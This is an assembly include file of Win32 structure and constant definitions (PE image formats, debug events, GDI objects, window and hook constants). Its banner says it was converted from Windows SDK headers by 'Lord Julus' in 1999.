IMAGE_SYM_CLASS_LABEL EQU 0006h
IMAGE_SYM_CLASS_UNDEFINED_LABEL EQU 0007h
IMAGE_SYM_CLASS_MEMBER_OF_STRUCT EQU 0008h
IMAGE_SYM_CLASS_ARGUMENT EQU 0009h
IMAGE_SYM_CLASS_STRUCT_TAG EQU 000Ah
IMAGE_SYM_CLASS_MEMBER_OF_UNION EQU 000Bh
IMAGE_SYM_CLASS_UNION_TAG EQU 000Ch
IMAGE_SYM_CLASS_TYPE_DEFINITION EQU 000Dh
IMAGE_SYM_CLASS_UNDEFINED_STATIC EQU 000Eh
IMAGE_SYM_CLASS_ENUM_TAG EQU 000Fh
IMAGE_SYM_CLASS_MEMBER_OF_ENUM EQU 0010h
IMAGE_SYM_CLASS_REGISTER_PARAM EQU 0011h
IMAGE_SYM_CLASS_BIT_FIELD EQU 0012h
IMAGE_SIZEOF_AUX_SYMBOL EQU 18
IMAGE_COMDAT_SELECT_NODUPLICATES EQU 1
IMAGE_COMDAT_SELECT_ANY EQU 2
IMAGE_COMDAT_SELECT_SAME_SIZE EQU 3
IMAGE_COMDAT_SELECT_EXACT_MATCH EQU 4
IMAGE_COMDAT_SELECT_ASSOCIATIVE EQU 5
IMAGE_COMDAT_SELECT_LARGEST EQU 6
IMAGE_COMDAT_SELECT_NEWEST EQU 7
IMAGE_WEAK_EXTERN_SEARCH_NOLIBRARY EQU 1
IMAGE_WEAK_EXTERN_SEARCH_LIBRARY EQU 2
IMAGE_WEAK_EXTERN_SEARCH_ALIAS EQU 3
IMAGE_SIZEOF_RELOCATION EQU 10
IMAGE_SIZEOF_LINENUMBER EQU 6
IMAGE_SIZEOF_BASE_RELOCATION EQU 8
IMAGE_REL_BASED_ABSOLUTE EQU 0
IMAGE_REL_BASED_HIGH EQU 1
IMAGE_REL_BASED_LOW EQU 2
IMAGE_REL_BASED_HIGHLOW EQU 3
IMAGE_REL_BASED_HIGHADJ EQU 4
IMAGE_REL_BASED_MIPS_JMPADDR EQU 5
IMAGE_REL_BASED_SECTION EQU 6
IMAGE_REL_BASED_REL32 EQU 7
IMAGE_REL_BASED_MIPS_JMPADDR16 EQU 9
IMAGE_REL_BASED_IA64_IMM64 EQU 9
IMAGE_REL_BASED_DIR64 EQU 10
IMAGE_REL_BASED_HIGH3ADJ EQU 11
IMAGE_DEBUG_TYPE_UNKNOWN EQU 0
IMAGE_DEBUG_TYPE_COFF EQU 1
IMAGE_DEBUG_TYPE_CODEVIEW EQU 2
IMAGE_DEBUG_TYPE_FPO EQU 3
IMAGE_DEBUG_TYPE_MISC EQU 4
IMAGE_DEBUG_TYPE_EXCEPTION EQU 5
IMAGE_DEBUG_TYPE_FIXUP EQU 6
IMAGE_DEBUG_TYPE_OMAP_TO_SRC EQU 7
IMAGE_DEBUG_TYPE_OMAP_FROM_SRC EQU 8
IMAGE_DEBUG_TYPE_BORLAND EQU 9
IMAGE_DEBUG_TYPE_RESERVED10 EQU 10
IMAGE_DEBUG_MISC_EXENAME EQU 1
; G = GLOBAL
; L = LOCAL (NB. IN WIN95/98/NT GLOBAL=LOCAL)
; Relocation format.
COMMENT $
; Thread Local Storage
IMAGE_TLS_DIRECTORY32 STRUC
TLS_StartAddressOfRawData DD BYTE PTR ?
TLS_EndAddressOfRawData DD BYTE PTR ?
TLS_AddressOfIndex DD BYTE PTR ?
TLS_AddressOfCallBacks DD IMAGE_TLS_CALLBACK PTR ?
TLS_SizeOfZeroFill DD 0
TLS_Characteristics DD 0
ENDS
$
IMAGE_BOUND_IMPORT_DESCRIPTOR STRUC ;
BID_TimeDateStamp DD ? ;
BID_OffsetModuleName DW ? ;
BID_NumberOfModuleForwarderRefs DW ? ;
IMAGE_BOUND_IMPORT_DESCRIPTOR ENDS ;
IMAGE_BOUND_FORWARDER_REF STRUC ;
BFR_TimeDateStamp DD ? ;
BFR_OffsetModuleName DW ? ;
BFR_Reserved DW ? ;
IMAGE_BOUND_FORWARDER_REF ENDS ;
IMAGE_RESOURCE_DIRECTORY STRUC ;
RD_Characteristics DD ? ;
RD_TimeDateStamp DD ? ;
RD_MajorVersion DW ? ;
RD_MinorVersion DW ? ;
RD_NumberOfNamedEntries DW ? ;
RD_NumberOfIdEntries DW ? ;
IMAGE_RESOURCE_DIRECTORY ENDS ;
IMAGE_RESOURCE_DIRECTORY_SIZE = SIZE IMAGE_RESOURCE_DIRECTORY
IMAGE_RESOURCE_DIRECTORY_ENTRY STRUC ;
UNION ;
STRUC ;
RDE_Offset RECORD { ;
RDE_NameOffset:31 ;
RDE_NameIsString:1 } ;
ENDS ;
RDE_Name DD ? ;
RDE_Id DW ? ;
ENDS ;
UNION ;
RDE_OffsetToData DD ? ;
STRUC ;
RDE_Directory RECORD { ;
RDE_OffsetToDirectory:31 ;
RDE_DataIsDirectory:1 } ;
ENDS ;
ENDS ;
IMAGE_RESOURCE_DIRECTORY_ENTRY ENDS ;
IMAGE_RESOURCE_DIRECTORY_STRING STRUC ;
RDS_Length DW ? ;
RDS_NameString DB 1 DUP(?) ;
IMAGE_RESOURCE_DIRECTORY_STRING ENDS ;
IMAGE_RESOURCE_DIR_STRING_U STRUC ;
RDSU_Length DW ? ;
RDSU_NameString DB 1 DUP (?) ;
ENDS ;
IMAGE_RESOURCE_DATA_ENTRY STRUC ;
REDE_OffsetToData DD ? ;
REDE_Size DD ? ;
REDE_CodePage DD ? ;
REDE_Reserved DD ? ;
IMAGE_RESOURCE_DATA_ENTRY ENDS ;
IMAGE_DEBUG_DIRECTORY STRUC ;
DD_Characteristics DD ? ;
DD_TimeDateStamp DD ? ;
DD_MajorVersion DW ? ;
DD_MinorVersion DW ? ;
DD_Type DD ? ;
DD_SizeOfData DD ? ;
DD_AddressOfRawData DD BYTE PTR ? ;
DD_PointerToRawData DD BYTE PTR ? ;
IMAGE_DEBUG_DIRECTORY ENDS ;
IMAGE_COFF_SYMBOLS_HEADER STRUC ;
CSH_NumberOfSymbols DD ? ;
CSH_LvaToFirstSymbol DD BYTE PTR ? ;
CSH_NumberOfLinenumbers DD ? ;
CSH_LvaToFirstLinenumber DD BYTE PTR ? ;
CSH_RvaToFirstByteOfCode DD BYTE PTR ? ;
CSH_RvaToLastByteOfCode DD BYTE PTR ? ;
CSH_RvaToFirstByteOfData DD BYTE PTR ? ;
CSH_RvaToLastByteOfData DD BYTE PTR ? ;
IMAGE_COFF_SYMBOLS_HEADER ENDS ;
IMAGE_DEBUG_MISC STRUC ;
DM_DataType DD ? ; type of misc data, see defines
DM_Length DD ? ; total length of record, rounded to four
DM_Unicode DB ? ; TRUE if data is unicode string
DM_Reserved DB 3 DUP(?) ;
DM_Data DB 1 DUP(?) ; Actual data
IMAGE_DEBUG_MISC ENDS ;
IMAGE_SEPARATE_DEBUG_HEADER STRUC ;
SDH_Signature DW ? ;
SDH_Flags DW ? ;
SDH_Machine DW ? ;
SDH_Characteristics DW ? ;
SDH_TimeDateStamp DD ? ;
SDH_CheckSum DD ? ;
SDH_ImageBase DD BYTE PTR ? ;
SDH_SizeOfImage DD ? ;
SDH_NumberOfSections DD ? ;
SDH_ExportedNamesSize DD ? ;
SDH_DebugDirectorySize DD ? ;
SDH_SectionAlignment DD ? ;
SDH_Reserved DD 2 DUP (?) ;
IMAGE_SEPARATE_DEBUG_HEADER ENDS ;
IMPORT_OBJECT_HEADER STRUC ;
OH_Sig1 DW ? ; Must be IMAGE_FILE_MACHINE_UNKNOWN
OH_Sig2 DW ? ; Must be IMPORT_OBJECT_HDR_SIG2.
OH_Version DW ? ;
OH_Machine DW ? ;
OH_TimeDateStamp DD ? ; Time/date stamp
OH_SizeOfData DD ? ; particularly useful for incremental links
UNION ;
OH_Ordinal DW ? ; if grf & IMPORT_OBJECT_ORDINAL
OH_Hint DW ? ;
ENDS ;
OH_ImportType RECORD { ;
OH_Type : 2 ; IMPORT_TYPE
OH_NameType : 3 ; IMPORT_NAME_TYPE
OH_Reserved : 11 } ; Reserved. Must be zero.
IMPORT_OBJECT_HEADER ENDS ;
FLOATING_SAVE_AREA STRUC
ControlWord DD ?
StatusWord DD ?
TagWord DD ?
ErrorOffset DD ?
ErrorSelector DD ?
DataOffset DD ?
DataSelector DD ?
RegisterArea DB SIZE_OF_80387_REGISTERS DUP(?)
Cr0NpxState DD ?
FLOATING_SAVE_AREA ENDS
CONTEXT STRUC
CONTEXT_ContextFlags DD ?
CONTEXT_Dr0 DD ?
CONTEXT_Dr1 DD ?
CONTEXT_Dr2 DD ?
CONTEXT_Dr3 DD ?
CONTEXT_Dr6 DD ?
CONTEXT_Dr7 DD ?
CONTEXT_FloatSave FLOATING_SAVE_AREA ?
CONTEXT_SegGs DD ?
CONTEXT_SegFs DD ?
CONTEXT_SegEs DD ?
CONTEXT_SegDs DD ?
CONTEXT_Edi DD ?
CONTEXT_Esi DD ?
CONTEXT_Ebx DD ?
CONTEXT_Edx DD ?
CONTEXT_Ecx DD ?
CONTEXT_Eax DD ?
CONTEXT_Ebp DD ?
CONTEXT_Eip DD ?
CONTEXT_SegCs DD ?
CONTEXT_EFlags DD ?
CONTEXT_Esp DD ?
CONTEXT_SegSs DD ?
EXCEPTION_RECORD STRUC
ER_ExceptionCode DD ?
ER_ExceptionFlags DD ?
ER_ExceptionRecord DD EXCEPTION_RECORD PTR ?
ER_ExceptionAddress DD BYTE PTR ?
ER_NumberParameters DD ?
ER_ExceptionInformation DD EXCEPTION_MAXIMUM_PARAMETERS DUP(?)
EXCEPTION_RECORD ENDS
EXCEPTION_POINTERS STRUC ;
EP_ExceptionRecord DD EXCEPTION_RECORD PTR ? ; pointer to exception rec
EP_ContextRecord DD CONTEXT PTR ? ; pointer to a context
EXCEPTION_POINTERS ENDS ;
MEMORY_BASIC_INFORMATION STRUC ;
MBI_BaseAddress DD BYTE PTR ? ;
MBI_AllocationBase DD BYTE PTR ? ;
MBI_AllocationProtect DD ? ;
MBI_RegionSize DD ? ;
MBI_State DD ? ;
MBI_Protect DD ? ;
MBI_Type DD ? ;
MEMORY_BASIC_INFORMATION ENDS ;
FILE_NOTIFY_INFORMATION STRUC ;
FNI_NextEntryOffset DD ? ;
FNI_Action DD ? ;
FNI_FileNameLength DD ? ;
FNI_FileName DB 1 DUP(?) ;
FILE_NOTIFY_INFORMATION ENDS ;
MESSAGE_RESOURCE_ENTRY STRUC ;
MRE_Length DW ? ;
MRE_Flags DW ? ;
MRE_Text DB 1 DUP(?) ;
MESSAGE_RESOURCE_ENTRY ENDS ;
MESSAGE_RESOURCE_BLOCK STRUC ;
MRB_LowId DD ? ;
MRB_HighId DD ? ;
MRB_OffsetToEntries DD ? ;
MESSAGE_RESOURCE_BLOCK ENDS ;
MESSAGE_RESOURCE_DATA STRUC ;
MRD_NumberOfBlocks DD ? ;
MRD_Blocks MESSAGE_RESOURCE_BLOCK 1 DUP(?) ;
MESSAGE_RESOURCE_DATA ENDS ;
EVENTLOGRECORD STRUC
ELR_Length DD ? ; Length of full record
ELR_Reserved DD ? ; Used by the service
ELR_RecordNumber DD ? ; Absolute record number
ELR_TimeGenerated DD ? ; Seconds since 1-1-1970
ELR_TimeWritten DD ? ; Seconds since 1-1-1970
ELR_EventID DD ? ;
ELR_EventType DW ? ;
ELR_NumStrings DW ? ;
ELR_EventCategory DW ? ;
ELR_ReservedFlags DW ? ; For use with paired events (auditing)
ELR_ClosingRecordNumber DD ? ; For use with paired events (auditing)
ELR_StringOffset DD ? ; Offset from beginning of record
ELR_UserSidLength DD ? ;
ELR_UserSidOffset DD ? ;
ELR_DataLength DD ? ;
ELR_DataOffset DD ? ; Offset from beginning of record
EVENTLOGRECORD ENDS ;
OVERLAPPED STRUC ;
O_Internal DD ? ;
O_InternalHigh DD ? ;
O_Offset DD ? ;
O_OffsetHigh DD ? ;
O_hEvent DD ? ;
OVERLAPPED ENDS ;
SECURITY_ATTRIBUTES STRUC ;
SA_nLength DD ? ;
SA_lpSecurityDescriptor DD BYTE PTR ? ;
SA_bInheritHandle DB ? ;
SECURITY_ATTRIBUTES ENDS ;
PROCESS_INFORMATION STRUC ;
PI_hProcess DD ? ;
PI_hThread DD ? ;
PI_dwProcessId DD ? ;
PI_dwThreadId DD ? ;
PROCESS_INFORMATION ENDS ;
FILETIME STRUC ;
FT_dwLowDateTime DD ? ;
FT_dwHighDateTime DD ? ;
FILETIME ENDS ;
SYSTEMTIME STRUC ;
ST_wYear DW ? ;
ST_wMonth DW ? ;
ST_wDayOfWeek DW ? ;
ST_wDay DW ? ;
ST_wHour DW ? ;
ST_wMinute DW ? ;
ST_wSecond DW ? ;
ST_wMilliseconds DW ? ;
SYSTEMTIME ENDS ;
SYSTEM_INFO STRUC ;
UNION ;
SI_dwOemId DW ? ; Obsolete field...do not use
STRUC ;
SI_wProcessorArchitecture DW ? ;
SI_wReserved DW ? ;
ENDS ;
ENDS ;
SI_dwPageSize DD ? ;
SI_lpMinimumApplicationAddress DD BYTE PTR ?
SI_lpMaximumApplicationAddress DD BYTE PTR ?
SI_dwActiveProcessorMask DD ? ;
SI_dwNumberOfProcessors DD ? ;
SI_dwProcessorType DD ? ;
SI_dwAllocationGranularity DD ? ;
SI_wProcessorLevel DW ? ;
SI_wProcessorRevision DW ? ;
SYSTEM_INFO ENDS ;
MEMORYSTATUS STRUC ;
MS_dwLength DD ? ;
MS_dwMemoryLoad DD ? ;
MS_dwTotalPhys DD ? ;
MS_dwAvailPhys DD ? ;
MS_dwTotalPageFile DD ? ;
MS_dwAvailPageFile DD ? ;
MS_dwTotalVirtual DD ? ;
MS_dwAvailVirtual DD ? ;
MEMORYSTATUS ENDS ;
EXCEPTION_DEBUG_INFO STRUC ;
EDI_ExceptionRecord EXCEPTION_RECORD ? ;
EDI_dwFirstChance DD ? ;
EXCEPTION_DEBUG_INFO ENDS ;
CREATE_THREAD_DEBUG_INFO STRUC ;
CTDI_hThread DD ? ;
CTDI_lpThreadLocalBase DD BYTE PTR ? ;
CTDI_lpStartAddress DD BYTE PTR THREAD_START_ROUTINE
CREATE_THREAD_DEBUG_INFO ENDS ;
CREATE_PROCESS_DEBUG_INFO STRUC ;
CPDI_hFile DD ? ;
CPDI_hProcess DD ? ;
CPDI_hThread DD ? ;
CPDI_lpBaseOfImage DD BYTE PTR ? ;
CPDI_dwDebugInfoFileOffset DD ? ;
CPDI_nDebugInfoSize DD ? ;
CPDI_lpThreadLocalBase DD BYTE PTR ? ;
CPDI_lpStartAddress DD BYTE PTR THREAD_START_ROUTINE
CPDI_lpImageName DD BYTE PTR ? ;
CPDI_fUnicode DW ? ;
CREATE_PROCESS_DEBUG_INFO ENDS ;
EXIT_THREAD_DEBUG_INFO STRUC ;
ETDI_dwExitCode DD ? ;
EXIT_THREAD_DEBUG_INFO ENDS ;
EXIT_PROCESS_DEBUG_INFO STRUC ;
EPDI_dwExitCode DD ? ;
EXIT_PROCESS_DEBUG_INFO ENDS ;
LOAD_DLL_DEBUG_INFO STRUC ;
LDDI_hFile DD ? ;
LDDI_lpBaseOfDll DD BYTE PTR ? ;
LDDI_dwDebugInfoFileOffset DD ? ;
LDDI_nDebugInfoSize DD ? ;
LDDI_lpImageName DD BYTE PTR ? ;
LDDI_fUnicode DW ? ;
LOAD_DLL_DEBUG_INFO ENDS ;
UNLOAD_DLL_DEBUG_INFO STRUC ;
UDDI_lpBaseOfDll DD BYTE PTR ? ;
UNLOAD_DLL_DEBUG_INFO ENDS ;
OUTPUT_DEBUG_STRING_INFO STRUC ;
ODSI_lpDebugStringData DD BYTE PTR ? ;
ODSI_fUnicode DW ? ;
ODSI_nDebugStringLength DW ? ;
OUTPUT_DEBUG_STRING_INFO ENDS ;
RIP_INFO STRUC
RIP_dwError dd ?
RIP_dwType dd ?
RIP_INFO ENDS
DEBUG_EVENT STRUC ;
DEV_dwDebugEventCode DD ? ;
DEV_dwProcessId DD ? ;
DEV_dwThreadId DD ? ;
UNION ;
DEV_Exception EXCEPTION_DEBUG_INFO ? ;
DEV_CreateThread CREATE_THREAD_DEBUG_INFO ? ;
DEV_CreateProcessInfo CREATE_PROCESS_DEBUG_INFO ? ;
DEV_ExitThread EXIT_THREAD_DEBUG_INFO ? ;
DEV_ExitProcess EXIT_PROCESS_DEBUG_INFO ? ;
DEV_LoadDll LOAD_DLL_DEBUG_INFO ? ;
DEV_UnloadDll UNLOAD_DLL_DEBUG_INFO ? ;
DEV_DebugString OUTPUT_DEBUG_STRING_INFO ? ;
DEV_RipInfo RIP_INFO ? ;
ENDS ;
DEBUG_EVENT ENDS ;
PROCESS_HEAP_ENTRY STRUC ;
lpData DD BYTE PTR ? ;
cbData DD ? ;
cbOverhead DB ? ;
iRegionIndex DB ? ;
wFlags DW ? ;
UNION ;
STRUC ;
hMem DD ? ;
dwReserved DD 3 DUP(?) ;
ENDS ;
STRUC ;
dwCommittedSize DD ? ;
dwUnCommittedSize DD ? ;
lpFirstBlock DD BYTE PTR ? ;
lpLastBlock DD BYTE PTR ? ;
ENDS ;
ENDS ;
PROCESS_HEAP_ENTRY ENDS ;
STARTUPINFO STRUC ;
STI_cb DD ? ;
STI_lpReserved DD BYTE PTR ? ;
STI_lpDesktop DD BYTE PTR ? ;
STI_lpTitle DD BYTE PTR ? ;
STI_dwX DD ? ;
STI_dwY DD ? ;
STI_dwXSize DD ? ;
STI_dwYSize DD ? ;
STI_dwXCountChars DD ? ;
STI_dwYCountChars DD ? ;
STI_dwFillAttribute DD ? ;
STI_dwFlags DD ? ;
STI_wShowWindow DW ? ;
STI_cbReserved2 DW ? ;
STI_lpReserved2 DD BYTE PTR ? ;
STI_hStdInput DD ? ;
STI_hStdOutput DD ? ;
STI_hStdError DD ? ;
STARTUPINFO ENDS ;
WIN32_FIND_DATA STRUC ;
WFD_dwFileAttributes DD ? ;
WFD_ftCreationTime FILETIME ? ;
WFD_ftLastAccessTime FILETIME ? ;
WFD_ftLastWriteTime FILETIME ? ;
WFD_nFileSizeHigh DD ? ;
WFD_nFileSizeLow DD ? ;
WFD_dwReserved0 DD ? ;
WFD_dwReserved1 DD ? ;
WFD_cFileName DB MAX_PATH DUP(?) ;
WFD_cAlternateFileName DB 14 DUP(?) ;
WIN32_FIND_DATA ENDS ;
WIN32_FILE_ATTRIBUTE_DATA STRUC ;
WFAD_dwFileAttributes DD ? ;
WFAD_ftCreationTime FILETIME ? ;
WFAD_ftLastAccessTime FILETIME ? ;
WFAD_ftLastWriteTime FILETIME ? ;
WFAD_nFileSizeHigh DD ? ;
WFAD_nFileSizeLow DD ? ;
WIN32_FILE_ATTRIBUTE_DATA ENDS ;
; Point
POINT struc
x DD ?
y DD ?
POINT ends
; Rectangle
RECT struc
rcLeft UINT ?
rcTop UINT ?
rcRight UINT ?
rcBottom UINT ?
RECT ends
WNDCLASS struc
clsStyle UINT ? ; class style
clsLpfnWndProc ULONG ?
clsCbClsExtra UINT ?
clsCbWndExtra UINT ?
clsHInstance UINT ? ; instance handle
clsHIcon UINT ? ; class icon handle
clsHCursor UINT ? ; class cursor handle
clsHbrBackground UINT ? ; class background brush
clsLpszMenuName ULONG ? ; menu name
clsLpszClassName ULONG ? ; far ptr to class name
WNDCLASS ends
STD_WINDOW STRUC
wcxSize dd ?
wcxStyle dd ?
wcxWndProc dd ?
wcxClsExtra dd ?
wcxWndExtra dd ?
wcxInstance dd ?
wcxIcon dd ?
wcxCursor dd ?
wcxBkgndBrush dd ?
wcxMenuName dd ?
wcxClassName dd ?
wcxSmallIcon dd ?
STD_WINDOW ENDS
PAINTSTRUCT STRUC
PShdc UINT ?
PSfErase UINT ?
PSrcPaint UCHAR size RECT dup(?)
PSfRestore UINT ?
PSfIncUpdate UINT ?
PSrgbReserved UCHAR 16 dup(?)
PAINTSTRUCT ENDS
MSGSTRUCT struc
msHWND UINT ?
msMESSAGE UINT ?
msWPARAM UINT ?
msLPARAM ULONG ?
msTIME ULONG ?
msPT ULONG ?
MSGSTRUCT ends
MINMAXINFO struc
res_x dd ?
res_y dd ?
maxsize_x dd ?
maxsize_y dd ?
maxposition_x dd ?
maxposition_y dd ?
mintrackposition_x dd ?
mintrackposition_y dd ?
maxtrackposition_x dd ?
maxtrackposition_y dd ?
MINMAXINFO ends
TEXTMETRIC struc
tmHeight dw ?
tmAscent dw ?
tmDescent dw ?
tmIntLeading dw ?
tmExtLeading dw ?
tmAveCharWidth dw ?
tmMaxCharWidth dw ?
tmWeight dw ?
tmItalic db ?
tmUnderlined db ?
tmStruckOut db ?
tmFirstChar db ?
tmLastChar db ?
tmDefaultChar db ?
tmBreakChar db ?
tmPitch db ?
tmCharSet db ?
tmOverhang dw ?
tmAspectX dw ?
tmAspectY dw ?
TEXTMETRIC ends
LF_FACESIZE EQU 32
LOGFONT struc
lfHeight dw ?
lfWidth dw ?
lfEscapement dw ?
lfOrientation dw ?
lfWeight dw ?
lfItalic db ?
lfUnderline db ?
lfStrikeOut db ?
lfCharSet db ?
lfOutPrecision db ?
lfClipPrecision db ?
lfQuality db ?
lfPitchAndFamily db ?
lfFaceName db LF_FACESIZE dup(?)
LOGFONT ends
LOGBRUSH struc
lbStyle dw ?
lbColor dd ?
lbHatch dw ?
LOGBRUSH ends
TRANSPARENT = 1
OPAQUE = 2
; Mapping Modes
MM_TEXT = 1
MM_LOMETRIC = 2
MM_HIMETRIC = 3
MM_LOENGLISH = 4
MM_HIENGLISH = 5
MM_TWIPS = 6
MM_ISOTROPIC = 7
MM_ANISOTROPIC = 8
; Coordinate Modes
ABSOLUTE = 1
RELATIVE = 2
WHITE_BRUSH = 0
LTGRAY_BRUSH = 1
GRAY_BRUSH = 2
DKGRAY_BRUSH = 3
BLACK_BRUSH = 4
NULL_BRUSH = 5
HOLLOW_BRUSH = 5
WHITE_PEN = 6
BLACK_PEN = 7
NULL_PEN = 8
DOT_MARKER = 9
OEM_FIXED_FONT = 10
ANSI_FIXED_FONT = 11
ANSI_VAR_FONT = 12
SYSTEM_FONT = 13
DEVICE_DEFAULT_FONT = 14
DEFAULT_PALETTE = 15
SYSTEM_FIXED_FONT = 16
; Brush Styles
BS_SOLID = 0
BS_NULL = 1
BS_HOLLOW = BS_NULL
BS_HATCHED = 2
BS_PATTERN = 3
BS_INDEXED = 4
BS_DIBPATTERN = 5
; Hatch Styles
HS_HORIZONTAL = 0 ; -----
HS_VERTICAL = 1 ; |||||
HS_FDIAGONAL = 2 ; \\\\\
HS_BDIAGONAL = 3 ; /////
HS_CROSS = 4 ; +++++
HS_DIAGCROSS = 5 ; xxxxx
; Pen Styles
PS_SOLID = 0
PS_DASH = 1 ; -------
PS_DOT = 2 ; .......
PS_DASHDOT = 3 ; _._._._
PS_DASHDOTDOT = 4 ; _.._.._
PS_NULL = 5
PS_INSIDEFRAME = 6
; Device Technologies
DT_PLOTTER = 0 ; Vector plotter
DT_RASDISPLAY = 1 ; Raster display
DT_RASPRINTER = 2 ; Raster printer
DT_RASCAMERA = 3 ; Raster camera
DT_CHARSTREAM = 4 ; Character-stream, PLP
DT_METAFILE = 5 ; Metafile, VDM
DT_DISPFILE = 6 ; Display-file
; Curve Capabilities
; Line Capabilities
; Polygonal Capabilities
; Polygonal Capabilities
; Text Capabilities
; Raster Capabilities
SYSPAL_STATIC = 1
SYSPAL_NOSTATIC = 2
BI_RGB = 0
BI_RLE8 = 1
BI_RLE4 = 2
ANSI_CHARSET = 0
SYMBOL_CHARSET = 2
OEM_CHARSET = 255
RGN_AND = 1
RGN_OR = 2
RGN_XOR = 3
RGN_DIFF = 4
RGN_COPY = 5
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄ¿ ÚÄ¿
³ ³ This is my transformation of the original WINUSER.H ³ ³
³ ³ file from the Microsoft Windows SDK(C) for Windows NT 5.0 ³ ³
³ ³ beta 2 and Windows 98, released on in Sept. 1998. ³ ³
³ ³ This file was transformed by me from the original C ³ ³
³ ³ definition into assembly language. You can use this file to ³ ³
³ ³ quicken up writting your win32 programs in assembler. You ³ ³
³ ³ can use these files as you wish, as they are freeware. ³ ³
³ ³ ³ ³
³ ³ However, if you find any mistake inside this file, ³ ³
³ ³ it is probably due to the fact that I merely could see the ³ ³
³ ³ monitor while converting the files. So, if you do notice ³ ³
³ ³ something, please notify me on my e-mail address at: ³ ³
³ ³ ³ ³
³ ³ lordjulus@geocities.com ³ ³
³ ³ ³ ³
³ ³ Also, if you find any other useful stuff that can be ³ ³
³ ³ included here, do not hesitate to tell me. ³ ³
³ ³ ³ ³
³ ³ Good luck, ³ ³
³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³
³ ³ ³ Lord Julus (c) 1999 ³ ³ ³
³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³
³ ³ ³ ³
ÀÄÙ ÀÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
NETRESOURCEA STRUC
dwScope DD 0
dwType DD 0
dwDisplayType DD 0
dwUsage DD 0
lpLocalName DD 0
lpRemoteName DD 0
lpComment DD 0
lpProvider DD 0
NETRESOURCEA ENDS
;---
RT_CURSOR EQU 1
RT_BITMAP EQU 2
RT_ICON EQU 3
RT_MENU EQU 4
RT_DIALOG EQU 5
RT_STRING EQU 6
RT_FONTDIR EQU 7
RT_FONT EQU 8
RT_ACCELERATOR EQU 9
RT_RCDATA EQU 10
RT_MESSAGETABLE EQU 11
DIFFERENCE EQU 11
RT_GROUP_CURSOR EQU RT_CURSOR + DIFFERENCE
RT_GROUP_ICON EQU RT_ICON + DIFFERENCE
RT_VERSION EQU 16
RT_DLGINCLUDE EQU 17
RT_PLUGPLAY EQU 19
RT_VXD EQU 20
RT_ANICURSOR EQU 21
RT_ANIICON EQU 22
RT_HTML EQU 23
SB_HORZ EQU 0
SB_VERT EQU 1
SB_CTL EQU 2
SB_BOTH EQU 3
SB_LINEUP EQU 0
SB_LINELEFT EQU 0
SB_LINEDOWN EQU 1
SB_LINERIGHT EQU 1
SB_PAGEUP EQU 2
SB_PAGELEFT EQU 2
SB_PAGEDOWN EQU 3
SB_PAGERIGHT EQU 3
SB_THUMBPOSITION EQU 4
SB_THUMBTRACK EQU 5
SB_TOP EQU 6
SB_LEFT EQU 6
SB_BOTTOM EQU 7
SB_RIGHT EQU 7
SB_ENDSCROLL EQU 8
; ShowWindow() Commands
SW_HIDE EQU 0
SW_SHOWNORMAL EQU 1
SW_NORMAL EQU 1
SW_SHOWMINIMIZED EQU 2
SW_SHOWMAXIMIZED EQU 3
SW_MAXIMIZE EQU 3
SW_SHOWNOACTIVATE EQU 4
SW_SHOW EQU 5
SW_MINIMIZE EQU 6
SW_SHOWMINNOACTIVE EQU 7
SW_SHOWNA EQU 8
SW_RESTORE EQU 9
SW_SHOWDEFAULT EQU 10
SW_FORCEMINIMIZE EQU 11
SW_MAX EQU 11
HIDE_WINDOW EQU 0
SHOW_OPENWINDOW EQU 1
SHOW_ICONWINDOW EQU 2
SHOW_FULLSCREEN EQU 3
SHOW_OPENNOACTIVATE EQU 4
SW_PARENTCLOSING EQU 1
SW_OTHERZOOM EQU 2
SW_PARENTOPENING EQU 3
SW_OTHERUNZOOM EQU 4
; AnimateWindow() Commands
; SetWindowsHook() codes
WH_MIN EQU -1
WH_MSGFILTER EQU -1
WH_JOURNALRECORD EQU 0
WH_JOURNALPLAYBACK EQU 1
WH_KEYBOARD EQU 2
WH_GETMESSAGE EQU 3
WH_CALLWNDPROC EQU 4
WH_CBT EQU 5
WH_SYSMSGFILTER EQU 6
WH_MOUSE EQU 7
WH_HARDWARE EQU 8
WH_DEBUG EQU 9
WH_SHELL EQU 10
WH_FOREGROUNDIDLE EQU 11
WH_CALLWNDPROCRET EQU 12
WH_KEYBOARD_LL EQU 13
WH_MOUSE_LL EQU 14
WH_MAX EQU 14
; Hook Codes
HC_ACTION EQU 0
HC_GETNEXT EQU 1
HC_SKIP EQU 2
HC_NOREMOVE EQU 3
HC_NOREM EQU HC_NOREMOVE
HC_SYSMODALON EQU 4
HC_SYSMODALOFF EQU 5
HCBT_MOVESIZE EQU 0
HCBT_MINMAX EQU 1
HCBT_QS EQU 2
HCBT_CREATEWND EQU 3
HCBT_DESTROYWND EQU 4
HCBT_ACTIVATE EQU 5
HCBT_CLICKSKIPPED EQU 6
HCBT_KEYSKIPPED EQU 7
HCBT_SYSCOMMAND EQU 8
HCBT_SETFOCUS EQU 9
MSGF_DIALOGBOX EQU 0
MSGF_MESSAGEBOX EQU 1
MSGF_MENU EQU 2
MSGF_SCROLLBAR EQU 5
MSGF_NEXTWINDOW EQU 6
MSGF_MAX EQU 8 ; unused
